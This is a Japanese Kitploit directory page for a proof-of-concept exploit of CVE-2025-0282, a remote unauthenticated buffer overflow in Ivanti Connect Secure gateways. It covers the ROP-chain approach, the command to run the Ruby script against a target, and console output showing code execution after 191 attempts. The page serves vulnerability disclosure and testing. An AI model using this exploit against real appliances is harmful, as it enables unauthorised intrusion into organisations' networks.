Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-0282 — CVE-2025-0282 の PoC: Ivanti Connect Secure、Ivanti Policy Secure、Ivanti Neurons for ZTA gateways に影響を与えるリモートの認証不要なスタックベースのバッファオーバーフロー | Kitploit
ツール/GitHubGitHub/sfewer-r7/cve-2025-0282
脆弱性分析エクスプロイトペネトレーションテストリモートアクセスツールペイロード開発バイナリエクスプロイト
GitHubsfewer-r7/cve-2025-0282

CVE-2025-0282

CVE-2025-0282 の PoC: Ivanti Connect Secure、Ivanti Policy Secure、Ivanti Neurons for ZTA gateways に影響を与えるリモートの認証不要なスタックベースのバッファオーバーフロー

リポジトリを見る
50111年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-0282 の PoC

Ivanti Connect Secure、Ivanti Policy Secure、および Ivanti Neurons for ZTA ゲートウェイに影響を与える、リモート・認証不要のスタックベースのバッファオーバーフロー

概要

これは CVE-2025-0282 の悪用を実証するための概念実証エクスプロイトであり、watchTowr が公開した悪用手法に基づいています。

この PoC は、Ivanti Connect Secure 22.7r2.4 をターゲットとする ROP チェーンを備えています。他のバージョンをターゲットにするには、まずそのバージョンに対応する ROP チェーンを構築する必要があります。

この PoC には、ターゲットシステム上に一時ファイルを作成するオペレーティングシステムコマンドを実行するペイロードが含まれています。これにより、エクスプロイトが成功したことが分かります。コード実行は、非 root ユーザー nr の権限で達成されます。

使用方法

次のように、バージョン 22.7r2.4 の脆弱な Ivanti Connect Secure ターゲットに対してこのスクリプトを実行できます:

root@kitploit:~
C:\Users\sfewer\Desktop\CVE-2025-0282>ruby CVE-2025-0282.rb -t 192.168.86.111 -p 443
[+] Targeting 192.168.86.111:443
[+] Detected version 22.7.2.3597
[2025-01-16 14:39:56 +0000] Starting...
[2025-01-16 14:39:56 +0000] Triggering #1...
[2025-01-16 14:39:57 +0000] Triggering #2...
[2025-01-16 14:40:08 +0000] Triggering #3...
[2025-01-16 14:40:19 +0000] Triggering #4...
[2025-01-16 14:40:30 +0000] Triggering #5...

...snip...

[2025-01-16 15:13:28 +0000] Triggering #188...
[2025-01-16 15:13:38 +0000] Triggering #189...
[2025-01-16 15:13:49 +0000] Triggering #190...
[2025-01-16 15:14:00 +0000] Triggering #191...

エクスプロイトが成功すると、一時ディレクトリ /var/tmp/ に新しいファイルが書き込まれます。ファイル名には、エクスプロイトの試行回数に対応する数値が含まれます。

ターゲットデバイス上の別の root シェル(アプライアンスをジェイルブレイクして確立したもの)で、エクスプロイトが成功したタイミングを確認できます:

root@kitploit:~
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
ls: cannot access /var/tmp/hax*: No such file or directory
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191
bash-4.2#

この例から、エクスプロイトは 190 回の試行に失敗し、191 回目で成功したことが分かります。したがって、この例では、このターゲットへのエクスプロイトは 34 分で成功しました。

ツールをダウンロード